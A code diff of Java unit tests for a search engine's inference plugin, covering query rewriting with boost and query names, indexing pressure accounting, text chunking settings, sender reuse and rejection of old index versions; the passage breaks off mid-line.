-72,6 +80,14 @@ public void testKnnWithQueryBuilderWithoutInferenceIdIsInterceptedAndRewritten() QueryRewriteContext context = createQueryRewriteContext(inferenceFields); QueryVectorBuilder queryVectorBuilder = new TextEmbeddingQueryVectorBuilder(null, QUERY); KnnVectorQueryBuilder original = new KnnVectorQueryBuilder(FIELD_NAME, queryVectorBuilder, 10, 100, null); + if (randomBoolean()) { + float boost = randomFloatBetween(1, 10, randomBoolean()); + original.boost(boost); + } + if (randomBoolean()) { + String queryName = randomAlphaOfLength(5); + original.queryName(queryName); + } testRewrittenInferenceQuery(context, original); } @@ -82,14 +98,23 @@ private void testRewrittenInferenceQuery(QueryRewriteContext context, KnnVectorQ rewritten instanceof InterceptedQueryBuilderWrapper ); InterceptedQueryBuilderWrapper intercepted = (InterceptedQueryBuilderWrapper) rewritten; + assertEquals(original.boost(), intercepted.boost(), 0.0f); + assertEquals(original.queryName(), intercepted.queryName()); assertTrue(intercepted.queryBuilder instanceof NestedQueryBuilder); + NestedQueryBuilder nestedQueryBuilder = (NestedQueryBuilder) intercepted.queryBuilder; + assertEquals(original.boost(), nestedQueryBuilder.boost(), 0.0f); + assertEquals(original.queryName(), nestedQueryBuilder.queryName()); assertEquals(SemanticTextField.getChunksFieldName(FIELD_NAME), nestedQueryBuilder.path()); + QueryBuilder innerQuery = nestedQueryBuilder.query(); assertTrue(innerQuery instanceof KnnVectorQueryBuilder); KnnVectorQueryBuilder knnVectorQueryBuilder = (KnnVectorQueryBuilder) innerQuery; + assertEquals(1.0f, knnVectorQueryBuilder.boost(), 0.0f); + assertNull(knnVectorQueryBuilder.queryName()); assertEquals(SemanticTextField.getEmbeddingsFieldName(FIELD_NAME), knnVectorQueryBuilder.getFieldName()); assertTrue(knnVectorQueryBuilder.queryVectorBuilder() instanceof TextEmbeddingQueryVectorBuilder); + TextEmbeddingQueryVectorBuilder textEmbeddingQueryVectorBuilder = (TextEmbeddingQueryVectorBuilder) knnVectorQueryBuilder .queryVectorBuilder(); assertEquals(QUERY, textEmbeddingQueryVectorBuilder.getModelText()); diff --git a/x-pack/plugin/inference/src/test/java/org/elasticsearch/index/query/SemanticMatchQueryRewriteInterceptorTests.java b/x-pack/plugin/inference/src/test/java/org/elasticsearch/index/query/SemanticMatchQueryRewriteInterceptorTests.java index 6987ef33ed63d..b58547e1a92c7 100644 --- a/x-pack/plugin/inference/src/test/java/org/elasticsearch/index/query/SemanticMatchQueryRewriteInterceptorTests.java +++ b/x-pack/plugin/inference/src/test/java/org/elasticsearch/index/query/SemanticMatchQueryRewriteInterceptorTests.java @@ -36,6 +36,8 @@ public class SemanticMatchQueryRewriteInterceptorTests extends ESTestCase { private static final String FIELD_NAME = "fieldName"; private static final String VALUE = "value"; + private static final String QUERY_NAME = "match_query"; + private static final float BOOST = 5.0f; @Before public void setup() { @@ -79,6 +81,29 @@ public void testMatchQueryOnNonInferenceFieldRemainsMatchQuery() throws IOExcept assertEquals(original, rewritten); } + public void testBoostAndQueryNameInMatchQueryRewrite() throws IOException { + Map inferenceFields = Map.of( + FIELD_NAME, + new InferenceFieldMetadata(index.getName(), "inferenceId", new String[] { FIELD_NAME }, null) + ); + QueryRewriteContext context = createQueryRewriteContext(inferenceFields); + QueryBuilder original = createTestQueryBuilder(); + original.boost(BOOST); + original.queryName(QUERY_NAME); + QueryBuilder rewritten = original.rewrite(context); + assertTrue( + "Expected query to be intercepted, but was [" + rewritten.getClass().getName() + "]", + rewritten instanceof InterceptedQueryBuilderWrapper + ); + InterceptedQueryBuilderWrapper intercepted = (InterceptedQueryBuilderWrapper) rewritten; + assertEquals(BOOST, intercepted.boost(), 0.0f); + assertEquals(QUERY_NAME, intercepted.queryName()); + assertTrue(intercepted.queryBuilder instanceof SemanticQueryBuilder); + SemanticQueryBuilder semanticQueryBuilder = (SemanticQueryBuilder) intercepted.queryBuilder; + assertEquals(FIELD_NAME, semanticQueryBuilder.getFieldName()); + assertEquals(VALUE, semanticQueryBuilder.getQuery()); + } + private MatchQueryBuilder createTestQueryBuilder() { return new MatchQueryBuilder(FIELD_NAME, VALUE); } diff --git a/x-pack/plugin/inference/src/test/java/org/elasticsearch/index/query/SemanticSparseVectorQueryRewriteInterceptorTests.java b/x-pack/plugin/inference/src/test/java/org/elasticsearch/index/query/SemanticSparseVectorQueryRewriteInterceptorTests.java index 075955766a0a9..401b7085e2cb5 100644 --- a/x-pack/plugin/inference/src/test/java/org/elasticsearch/index/query/SemanticSparseVectorQueryRewriteInterceptorTests.java +++ b/x-pack/plugin/inference/src/test/java/org/elasticsearch/index/query/SemanticSparseVectorQueryRewriteInterceptorTests.java @@ -58,21 +58,15 @@ public void testSparseVectorQueryOnInferenceFieldIsInterceptedAndRewritten() thr ); QueryRewriteContext context = createQueryRewriteContext(inferenceFields); QueryBuilder original = new SparseVectorQueryBuilder(FIELD_NAME, INFERENCE_ID, QUERY); - QueryBuilder rewritten = original.rewrite(context); - assertTrue( - "Expected query to be intercepted, but was [" + rewritten.getClass().getName() + "]", - rewritten instanceof InterceptedQueryBuilderWrapper - ); - InterceptedQueryBuilderWrapper intercepted = (InterceptedQueryBuilderWrapper) rewritten; - assertTrue(intercepted.queryBuilder instanceof NestedQueryBuilder); - NestedQueryBuilder nestedQueryBuilder = (NestedQueryBuilder) intercepted.queryBuilder; - assertEquals(SemanticTextField.getChunksFieldName(FIELD_NAME), nestedQueryBuilder.path()); - QueryBuilder innerQuery = nestedQueryBuilder.query(); - assertTrue(innerQuery instanceof SparseVectorQueryBuilder); - SparseVectorQueryBuilder sparseVectorQueryBuilder = (SparseVectorQueryBuilder) innerQuery; - assertEquals(SemanticTextField.getEmbeddingsFieldName(FIELD_NAME), sparseVectorQueryBuilder.getFieldName()); - assertEquals(INFERENCE_ID, sparseVectorQueryBuilder.getInferenceId()); - assertEquals(QUERY, sparseVectorQueryBuilder.getQuery()); + if (randomBoolean()) { + float boost = randomFloatBetween(1, 10, randomBoolean()); + original.boost(boost); + } + if (randomBoolean()) { + String queryName = randomAlphaOfLength(5); + original.queryName(queryName); + } + testRewrittenInferenceQuery(context, original); } public void testSparseVectorQueryOnInferenceFieldWithoutInferenceIdIsInterceptedAndRewritten() throws IOException { @@ -82,32 +76,52 @@ public void testSparseVectorQueryOnInferenceFieldWithoutInferenceIdIsIntercepted ); QueryRewriteContext context = createQueryRewriteContext(inferenceFields); QueryBuilder original = new SparseVectorQueryBuilder(FIELD_NAME, null, QUERY); + if (randomBoolean()) { + float boost = randomFloatBetween(1, 10, randomBoolean()); + original.boost(boost); + } + if (randomBoolean()) { + String queryName = randomAlphaOfLength(5); + original.queryName(queryName); + } + testRewrittenInferenceQuery(context, original); + } + + public void testSparseVectorQueryOnNonInferenceFieldRemainsUnchanged() throws IOException { + QueryRewriteContext context = createQueryRewriteContext(Map.of()); // No inference fields + QueryBuilder original = new SparseVectorQueryBuilder(FIELD_NAME, INFERENCE_ID, QUERY); + QueryBuilder rewritten = original.rewrite(context); + assertTrue( + "Expected query to remain sparse_vector but was [" + rewritten.getClass().getName() + "]", + rewritten instanceof SparseVectorQueryBuilder + ); + assertEquals(original, rewritten); + } + + private void testRewrittenInferenceQuery(QueryRewriteContext context, QueryBuilder original) throws IOException { QueryBuilder rewritten = original.rewrite(context); assertTrue( "Expected query to be intercepted, but was [" + rewritten.getClass().getName() + "]", rewritten instanceof InterceptedQueryBuilderWrapper ); InterceptedQueryBuilderWrapper intercepted = (InterceptedQueryBuilderWrapper) rewritten; + assertEquals(original.boost(), intercepted.boost(), 0.0f); + assertEquals(original.queryName(), intercepted.queryName()); + assertTrue(intercepted.queryBuilder instanceof NestedQueryBuilder); NestedQueryBuilder nestedQueryBuilder = (NestedQueryBuilder) intercepted.queryBuilder; assertEquals(SemanticTextField.getChunksFieldName(FIELD_NAME), nestedQueryBuilder.path()); + assertEquals(original.boost(), nestedQueryBuilder.boost(), 0.0f); + assertEquals(original.queryName(), nestedQueryBuilder.queryName()); + QueryBuilder innerQuery = nestedQueryBuilder.query(); assertTrue(innerQuery instanceof SparseVectorQueryBuilder); SparseVectorQueryBuilder sparseVectorQueryBuilder = (SparseVectorQueryBuilder) innerQuery; assertEquals(SemanticTextField.getEmbeddingsFieldName(FIELD_NAME), sparseVectorQueryBuilder.getFieldName()); assertEquals(INFERENCE_ID, sparseVectorQueryBuilder.getInferenceId()); assertEquals(QUERY, sparseVectorQueryBuilder.getQuery()); - } - - public void testSparseVectorQueryOnNonInferenceFieldRemainsUnchanged() throws IOException { - QueryRewriteContext context = createQueryRewriteContext(Map.of()); // No inference fields - QueryBuilder original = new SparseVectorQueryBuilder(FIELD_NAME, INFERENCE_ID, QUERY); - QueryBuilder rewritten = original.rewrite(context); - assertTrue( - "Expected query to remain sparse_vector but was [" + rewritten.getClass().getName() + "]", - rewritten instanceof SparseVectorQueryBuilder - ); - assertEquals(original, rewritten); + assertEquals(1.0f, sparseVectorQueryBuilder.boost(), 0.0f); + assertNull(sparseVectorQueryBuilder.queryName()); } private QueryRewriteContext createQueryRewriteContext(Map inferenceFields) { diff --git a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/action/filter/ShardBulkInferenceActionFilterTests.java b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/action/filter/ShardBulkInferenceActionFilterTests.java index a7cb0234aee59..5b4925d8fb0a3 100644 --- a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/action/filter/ShardBulkInferenceActionFilterTests.java +++ b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/action/filter/ShardBulkInferenceActionFilterTests.java @@ -616,14 +616,14 @@ public void testIndexingPressure() throws Exception { IndexingPressure.Coordinating coordinatingIndexingPressure = indexingPressure.getCoordinating(); assertThat(coordinatingIndexingPressure, notNullValue()); - verify(coordinatingIndexingPressure).increment(1, bytesUsed(doc0Source)); - verify(coordinatingIndexingPressure).increment(1, bytesUsed(doc1Source)); - verify(coordinatingIndexingPressure).increment(1, bytesUsed(doc2Source)); - verify(coordinatingIndexingPressure).increment(1, bytesUsed(doc3Source)); - verify(coordinatingIndexingPressure).increment(1, bytesUsed(doc4Source)); - verify(coordinatingIndexingPressure).increment(1, bytesUsed(doc0UpdateSource)); + verify(coordinatingIndexingPressure).increment(1, length(doc0Source)); + verify(coordinatingIndexingPressure).increment(1, length(doc1Source)); + verify(coordinatingIndexingPressure).increment(1, length(doc2Source)); + verify(coordinatingIndexingPressure).increment(1, length(doc3Source)); + verify(coordinatingIndexingPressure).increment(1, length(doc4Source)); + verify(coordinatingIndexingPressure).increment(1, length(doc0UpdateSource)); if (useLegacyFormat == false) { - verify(coordinatingIndexingPressure).increment(1, bytesUsed(doc1UpdateSource)); + verify(coordinatingIndexingPressure).increment(1, length(doc1UpdateSource)); } verify(coordinatingIndexingPressure, times(useLegacyFormat ? 6 : 7)).increment(eq(0), longThat(l -> l > 0)); @@ -720,7 +720,7 @@ public void testIndexingPressureTripsOnInferenceRequestGeneration() throws Excep IndexingPressure.Coordinating coordinatingIndexingPressure = indexingPressure.getCoordinating(); assertThat(coordinatingIndexingPressure, notNullValue()); - verify(coordinatingIndexingPressure).increment(1, bytesUsed(doc1Source)); + verify(coordinatingIndexingPressure).increment(1, length(doc1Source)); verify(coordinatingIndexingPressure, times(1)).increment(anyInt(), anyLong()); // Verify that the coordinating indexing pressure is maintained through downstream action filters @@ -759,7 +759,7 @@ public void testIndexingPressureTripsOnInferenceRequestGeneration() throws Excep public void testIndexingPressureTripsOnInferenceResponseHandling() throws Exception { final XContentBuilder doc1Source = IndexRequest.getXContentBuilder(XContentType.JSON, "sparse_field", "bar"); final InstrumentedIndexingPressure indexingPressure = new InstrumentedIndexingPressure( - Settings.builder().put(MAX_COORDINATING_BYTES.getKey(), (bytesUsed(doc1Source) + 1) + "b").build() + Settings.builder().put(MAX_COORDINATING_BYTES.getKey(), (length(doc1Source) + 1) + "b").build() ); final InferenceStats inferenceStats = new InferenceStats(mock(), mock()); @@ -802,7 +802,7 @@ public void testIndexingPressureTripsOnInferenceResponseHandling() throws Except IndexingPressure.Coordinating coordinatingIndexingPressure = indexingPressure.getCoordinating(); assertThat(coordinatingIndexingPressure, notNullValue()); - verify(coordinatingIndexingPressure).increment(1, bytesUsed(doc1Source)); + verify(coordinatingIndexingPressure).increment(1, length(doc1Source)); verify(coordinatingIndexingPressure).increment(eq(0), longThat(l -> l > 0)); verify(coordinatingIndexingPressure, times(2)).increment(anyInt(), anyLong()); @@ -862,14 +862,14 @@ public void testIndexingPressurePartialFailure() throws Exception { ); XContentBuilder builder = XContentFactory.jsonBuilder(); semanticTextField.toXContent(builder, EMPTY_PARAMS); - return bytesUsed(builder); + return length(builder); }; final InstrumentedIndexingPressure indexingPressure = new InstrumentedIndexingPressure( Settings.builder() .put( MAX_COORDINATING_BYTES.getKey(), - (bytesUsed(doc1Source) + bytesUsed(doc2Source) + estimateInferenceResultsBytes.apply(List.of("bar"), barEmbedding) + (length(doc1Source) + length(doc2Source) + estimateInferenceResultsBytes.apply(List.of("bar"), barEmbedding) + (estimateInferenceResultsBytes.apply(List.of("bazzz"), bazzzEmbedding) / 2)) + "b" ) .build() @@ -913,8 +913,8 @@ public void testIndexingPressurePartialFailure() throws Exception { IndexingPressure.Coordinating coordinatingIndexingPressure = indexingPressure.getCoordinating(); assertThat(coordinatingIndexingPressure, notNullValue()); - verify(coordinatingIndexingPressure).increment(1, bytesUsed(doc1Source)); - verify(coordinatingIndexingPressure).increment(1, bytesUsed(doc2Source)); + verify(coordinatingIndexingPressure).increment(1, length(doc1Source)); + verify(coordinatingIndexingPressure).increment(1, length(doc2Source)); verify(coordinatingIndexingPressure, times(2)).increment(eq(0), longThat(l -> l > 0)); verify(coordinatingIndexingPressure, times(4)).increment(anyInt(), anyLong()); @@ -1124,8 +1124,8 @@ private static BulkItemRequest[] randomBulkItemRequest( new BulkItemRequest(requestId, new IndexRequest("index").source(expectedDocMap, requestContentType)) }; } - private static long bytesUsed(XContentBuilder builder) { - return BytesReference.bytes(builder).ramBytesUsed(); + private static long length(XContentBuilder builder) { + return BytesReference.bytes(builder).length(); } @SuppressWarnings({ "unchecked" }) diff --git a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/action/task/StreamingTaskManagerTests.java b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/action/task/StreamingTaskManagerTests.java index 8ca4a5f2aa309..ba070c2caa56b 100644 --- a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/action/task/StreamingTaskManagerTests.java +++ b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/action/task/StreamingTaskManagerTests.java @@ -54,7 +54,7 @@ public void setUp() throws Exception { doAnswer(ans -> { TaskAwareRequest taskAwareRequest = ans.getArgument(2); return taskAwareRequest.createTask(1L, taskType, taskAction, TaskId.EMPTY_TASK_ID, Map.of()); - }).when(taskManager).register(any(), any(), any()); + }).when(taskManager).register(any(), any(), any(), eq(false)); } @After @@ -67,7 +67,7 @@ public void testSubscribeRegistersTask() { processor.subscribe(mock()); - verify(taskManager, only()).register(eq(taskType), eq(taskAction), any()); + verify(taskManager, only()).register(eq(taskType), eq(taskAction), any(), eq(false)); } public void testCancelPropagatesUpstreamAndDownstream() { @@ -77,7 +77,7 @@ public void testCancelPropagatesUpstreamAndDownstream() { var registeredTask = (CancellableTask) taskAwareRequest.createTask(1L, taskType, taskAction, TaskId.EMPTY_TASK_ID, Map.of()); task.set(registeredTask); return registeredTask; - }).when(taskManager).register(any(), any(), any()); + }).when(taskManager).register(any(), any(), any(), eq(false)); Flow.Subscriber downstream = mock(); Flow.Subscription upstream = mock(); @@ -173,7 +173,7 @@ public void testOnNextAfterCancelDoesNotForwardItem() { var registeredTask = (CancellableTask) taskAwareRequest.createTask(1L, taskType, taskAction, TaskId.EMPTY_TASK_ID, Map.of()); task.set(registeredTask); return registeredTask; - }).when(taskManager).register(any(), any(), any()); + }).when(taskManager).register(any(), any(), any(), eq(false)); var processor = streamingTaskManager.create(taskType, taskAction); var downstream = establishFlow(processor); diff --git a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/chunking/RecursiveChunkerTests.java b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/chunking/RecursiveChunkerTests.java index baa8429ae3c78..1cb90b11995fc 100644 --- a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/chunking/RecursiveChunkerTests.java +++ b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/chunking/RecursiveChunkerTests.java @@ -46,7 +46,7 @@ public void testChunkInputShorterThanMaxChunkSize() { assertExpectedChunksGenerated(input, settings, List.of(new Chunker.ChunkOffset(0, input.length()))); } - public void testChunkInputRequiresOneSplit() { + public void testChunkInputRequiresOneSplitWithoutMerges() { List separators = generateRandomSeparators(); RecursiveChunkingSettings settings = generateChunkingSettings(10, separators); String input = generateTestText(2, List.of(separators.getFirst())); @@ -58,7 +58,23 @@ public void testChunkInputRequiresOneSplit() { ); } - public void testChunkInputRequiresMultipleSplits() { + public void testChunkInputRequiresOneSplitWithMerges() { + List separators = generateRandomSeparators(); + RecursiveChunkingSettings settings = generateChunkingSettings(20, separators); + String input = generateTestText(3, List.of(separators.getFirst(), separators.getFirst())); + + var expectedFirstChunkOffsetEnd = TEST_SENTENCE.length() * 2 + separators.getFirst().length(); + assertExpectedChunksGenerated( + input, + settings, + List.of( + new Chunker.ChunkOffset(0, expectedFirstChunkOffsetEnd), + new Chunker.ChunkOffset(expectedFirstChunkOffsetEnd, input.length()) + ) + ); + } + + public void testChunkInputRequiresMultipleSplitsWithoutMerges() { var separators = generateRandomSeparators(); RecursiveChunkingSettings settings = generateChunkingSettings(15, separators); String input = generateTestText(4, List.of(separators.get(1), separators.getFirst(), separators.get(1))); @@ -78,6 +94,22 @@ public void testChunkInputRequiresMultipleSplits() { ); } + public void testChunkInputRequiresMultipleSplitsWithMerges() { + var separators = generateRandomSeparators(); + RecursiveChunkingSettings settings = generateChunkingSettings(25, separators); + String input = generateTestText(4, List.of(separators.get(1), separators.getFirst(), separators.get(1))); + + var expectedFirstChunkOffsetEnd = TEST_SENTENCE.length() * 2 + separators.get(1).length(); + assertExpectedChunksGenerated( + input, + settings, + List.of( + new Chunker.ChunkOffset(0, expectedFirstChunkOffsetEnd), + new Chunker.ChunkOffset(expectedFirstChunkOffsetEnd, input.length()) + ) + ); + } + public void testChunkInputDoesNotSplitWhenNoLongerExceedingMaxChunkSize() { var separators = randomSubsetOf(3, TEST_SEPARATORS); RecursiveChunkingSettings settings = generateChunkingSettings(25, separators); @@ -165,7 +197,7 @@ public void testChunkLongDocument() { public void testMarkdownChunking() { int numSentences = randomIntBetween(10, 50); - List separators = SeparatorSet.MARKDOWN.getSeparators(); + List separators = SeparatorGroup.MARKDOWN.getSeparators(); List validHeaders = List.of( "# Header\n", "## Header\n", diff --git a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/chunking/RecursiveChunkingSettingsTests.java b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/chunking/RecursiveChunkingSettingsTests.java index 40f14e88d2558..f833aa09b1aee 100644 --- a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/chunking/RecursiveChunkingSettingsTests.java +++ b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/chunking/RecursiveChunkingSettingsTests.java @@ -32,15 +32,15 @@ public void testFromMapValidSettingsWithSeparators() { assertEquals(separators, settings.getSeparators()); } - public void testFromMapValidSettingsWithSeparatorSet() { + public void testFromMapValidSettingsWithSeparatorGroup() { var maxChunkSize = randomIntBetween(10, 300); - var separatorSet = randomFrom(SeparatorSet.values()); - Map validSettings = buildChunkingSettingsMap(maxChunkSize, Optional.of(separatorSet.name()), Optional.empty()); + var separatorGroup = randomFrom(SeparatorGroup.values()); + Map validSettings = buildChunkingSettingsMap(maxChunkSize, Optional.of(separatorGroup.name()), Optional.empty()); RecursiveChunkingSettings settings = RecursiveChunkingSettings.fromMap(validSettings); assertEquals(maxChunkSize, settings.getMaxChunkSize()); - assertEquals(separatorSet.getSeparators(), settings.getSeparators()); + assertEquals(separatorGroup.getSeparators(), settings.getSeparators()); } public void testFromMapMaxChunkSizeTooSmall() { @@ -55,7 +55,7 @@ public void testFromMapMaxChunkSizeTooLarge() { assertThrows(ValidationException.class, () -> RecursiveChunkingSettings.fromMap(invalidSettings)); } - public void testFromMapInvalidSeparatorSet() { + public void testFromMapInvalidSeparatorGroup() { Map invalidSettings = buildChunkingSettingsMap(randomIntBetween(10, 300), Optional.of("invalid"), Optional.empty()); assertThrows(ValidationException.class, () -> RecursiveChunkingSettings.fromMap(invalidSettings)); @@ -68,7 +68,7 @@ public void testFromMapInvalidSettingKey() { assertThrows(ValidationException.class, () -> RecursiveChunkingSettings.fromMap(invalidSettings)); } - public void testFromMapBothSeparatorsAndSeparatorSet() { + public void testFromMapBothSeparatorsAndSeparatorGroup() { Map invalidSettings = buildChunkingSettingsMap( randomIntBetween(10, 300), Optional.of("default"), @@ -86,13 +86,13 @@ public void testFromMapEmptySeparators() { private Map buildChunkingSettingsMap( int maxChunkSize, - Optional separatorSet, + Optional separatorGroup, Optional> separators ) { Map settingsMap = new HashMap<>(); settingsMap.put(ChunkingSettingsOptions.STRATEGY.toString(), ChunkingStrategy.RECURSIVE.toString()); settingsMap.put(ChunkingSettingsOptions.MAX_CHUNK_SIZE.toString(), maxChunkSize); - separatorSet.ifPresent(s -> settingsMap.put(ChunkingSettingsOptions.SEPARATOR_SET.toString(), s)); + separatorGroup.ifPresent(s -> settingsMap.put(ChunkingSettingsOptions.SEPARATOR_GROUP.toString(), s)); separators.ifPresent(strings -> settingsMap.put(ChunkingSettingsOptions.SEPARATORS.toString(), strings)); return settingsMap; } diff --git a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/external/http/sender/HttpRequestSenderTests.java b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/external/http/sender/HttpRequestSenderTests.java index 81be52bc567e6..d8c8095879b55 100644 --- a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/external/http/sender/HttpRequestSenderTests.java +++ b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/external/http/sender/HttpRequestSenderTests.java @@ -58,6 +58,7 @@ import static org.hamcrest.Matchers.hasSize; import static org.hamcrest.Matchers.instanceOf; import static org.hamcrest.Matchers.is; +import static org.hamcrest.Matchers.sameInstance; import static org.mockito.ArgumentMatchers.anyString; import static org.mockito.Mockito.any; import static org.mockito.Mockito.doAnswer; @@ -90,6 +91,27 @@ public void shutdown() throws IOException, InterruptedException { webServer.close(); } + public void testCreateSender_ReturnsSameRequestExecutorInstance() { + var senderFactory = new HttpRequestSender.Factory(createWithEmptySettings(threadPool), clientManager, mockClusterServiceEmpty()); + + var sender1 = createSender(senderFactory); + var sender2 = createSender(senderFactory); + + assertThat(sender1, instanceOf(HttpRequestSender.class)); + assertThat(sender2, instanceOf(HttpRequestSender.class)); + assertThat(sender1, sameInstance(sender2)); + } + + public void testCreateSender_CanCallStartMultipleTimes() throws Exception { + var senderFactory = new HttpRequestSender.Factory(createWithEmptySettings(threadPool), clientManager, mockClusterServiceEmpty()); + + try (var sender = createSender(senderFactory)) { + sender.start(); + sender.start(); + sender.start(); + } + } + public void testCreateSender_SendsRequestAndReceivesResponse() throws Exception { var senderFactory = new HttpRequestSender.Factory(createWithEmptySettings(threadPool), clientManager, mockClusterServiceEmpty()); diff --git a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/mapper/SemanticTextFieldMapperTests.java b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/mapper/SemanticTextFieldMapperTests.java index 0fab22d45d08c..4ff4c79be7d28 100644 --- a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/mapper/SemanticTextFieldMapperTests.java +++ b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/mapper/SemanticTextFieldMapperTests.java @@ -107,6 +107,7 @@ import static org.elasticsearch.xpack.inference.mapper.SemanticTextFieldMapper.DEFAULT_ELSER_2_INFERENCE_ID; import static org.elasticsearch.xpack.inference.mapper.SemanticTextFieldMapper.DEFAULT_RESCORE_OVERSAMPLE; import static org.elasticsearch.xpack.inference.mapper.SemanticTextFieldMapper.INDEX_OPTIONS_FIELD; +import static org.elasticsearch.xpack.inference.mapper.SemanticTextFieldMapper.UNSUPPORTED_INDEX_MESSAGE; import static org.elasticsearch.xpack.inference.mapper.SemanticTextFieldTests.generateRandomChunkingSettings; import static org.elasticsearch.xpack.inference.mapper.SemanticTextFieldTests.generateRandomChunkingSettingsOtherThan; import static org.elasticsearch.xpack.inference.mapper.SemanticTextFieldTests.randomSemanticText; @@ -402,6 +403,57 @@ public void testInvalidTaskTypes() { } } + @Override + protected IndexVersion boostNotAllowedIndexVersion() { + return IndexVersions.NEW_SPARSE_VECTOR; + } + + public void testOldIndexSemanticTextDenseVectorRaisesError() throws IOException { + final String fieldName = "field"; + final XContentBuilder fieldMapping = fieldMapping(b -> { + b.field("type", "semantic_text"); + b.field(INFERENCE_ID_FIELD, "test_inference_id"); + b.startObject("model_settings"); + b.field("task_type", "text_embedding"); + b.field("dimensions", 384); + b.field("similarity", "cosine"); + b.field("element_type", "float"); + b.endObject(); + }); + assertOldIndexUnsupported(fieldMapping); + } + + public void testOldIndexSemanticTextMinimalMappingRaisesError() throws IOException { + final XContentBuilder fieldMapping = fieldMapping(this::minimalMapping); + assertOldIndexUnsupported(fieldMapping); + } + + public void testOldIndexSemanticTextSparseVersionRaisesError() throws IOException { + final XContentBuilder fieldMapping = fieldMapping(b -> { + b.field("type", "semantic_text"); + b.field("inference_id", "another_inference_id"); + b.startObject("model_settings"); + b.field("task_type", "sparse_embedding"); + b.endObject(); + }); + assertOldIndexUnsupported(fieldMapping); + } + + private void assertOldIndexUnsupported(XContentBuilder fieldMapping) { + + MapperParsingException exception = assertThrows( + MapperParsingException.class, + () -> createMapperService( + fieldMapping, + true, + IndexVersions.V_8_0_0, + IndexVersionUtils.getPreviousVersion(IndexVersions.NEW_SPARSE_VECTOR) + ) + ); + assertTrue(exception.getMessage().contains(UNSUPPORTED_INDEX_MESSAGE)); + assertTrue(exception.getRootCause() instanceof UnsupportedOperationException); + } + public void testMultiFieldsSupport() throws IOException { if (useLegacyFormat) { Exception e = expectThrows(MapperParsingException.class, () -> createMapperService(fieldMapping(b -> { @@ -1299,7 +1351,11 @@ public void testDefaultIndexOptions() throws IOException { b.field("similarity", "cosine"); b.field("element_type", "float"); b.endObject(); - }), useLegacyFormat, IndexVersions.SEMANTIC_TEXT_DEFAULTS_TO_BBQ_BACKPORT_8_X, IndexVersions.UPGRADE_TO_LUCENE_10_0_0); + }), + useLegacyFormat, + IndexVersions.SEMANTIC_TEXT_DEFAULTS_TO_BBQ_BACKPORT_8_X, + IndexVersionUtils.getPreviousVersion(IndexVersions.UPGRADE_TO_LUCENE_10_0_0) + ); assertSemanticTextField(mapperService, "field", true, null, defaultBbqHnswSemanticTextIndexOptions()); // Previous 8.x index versions do not set BBQ index options diff --git a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/amazonbedrock/client/AmazonBedrockRequestSenderTests.java b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/amazonbedrock/client/AmazonBedrockRequestSenderTests.java index 34b28b642df79..8a6a6a9c5eddf 100644 --- a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/amazonbedrock/client/AmazonBedrockRequestSenderTests.java +++ b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/amazonbedrock/client/AmazonBedrockRequestSenderTests.java @@ -37,7 +37,9 @@ import static org.elasticsearch.xpack.inference.Utils.inferenceUtilityPool; import static org.elasticsearch.xpack.inference.Utils.mockClusterServiceEmpty; import static org.elasticsearch.xpack.inference.services.amazonbedrock.client.AmazonBedrockExecutorTests.TEST_AMAZON_TITAN_EMBEDDINGS_RESULT; +import static org.hamcrest.Matchers.instanceOf; import static org.hamcrest.Matchers.is; +import static org.hamcrest.Matchers.sameInstance; import static org.mockito.Mockito.mock; public class AmazonBedrockRequestSenderTests extends ESTestCase { @@ -60,11 +62,37 @@ public void shutdown() throws IOException, InterruptedException { terminate(threadPool); } + public void testCreateSender_UsesTheSameInstanceForRequestExecutor() throws Exception { + var requestSender = new AmazonBedrockMockExecuteRequestSender(new AmazonBedrockMockClientCache(), mock(ThrottlerManager.class)); + requestSender.enqueue(AmazonBedrockExecutorTests.getTestInvokeResult(TEST_AMAZON_TITAN_EMBEDDINGS_RESULT)); + var senderFactory = createSenderFactory(threadPool, Settings.EMPTY, requestSender); + + var sender1 = createSender(senderFactory); + var sender2 = createSender(senderFactory); + + assertThat(sender1, instanceOf(AmazonBedrockRequestSender.class)); + assertThat(sender2, instanceOf(AmazonBedrockRequestSender.class)); + + assertThat(sender1, sameInstance(sender2)); + } + + public void testCreateSender_CanCallStartMultipleTimes() throws Exception { + var requestSender = new AmazonBedrockMockExecuteRequestSender(new AmazonBedrockMockClientCache(), mock(ThrottlerManager.class)); + requestSender.enqueue(AmazonBedrockExecutorTests.getTestInvokeResult(TEST_AMAZON_TITAN_EMBEDDINGS_RESULT)); + var senderFactory = createSenderFactory(threadPool, Settings.EMPTY, requestSender); + + try (var sender = createSender(senderFactory)) { + sender.start(); + sender.start(); + sender.start(); + } + } + public void testCreateSender_SendsEmbeddingsRequestAndReceivesResponse() throws Exception { - var senderFactory = createSenderFactory(threadPool, Settings.EMPTY); var requestSender = new 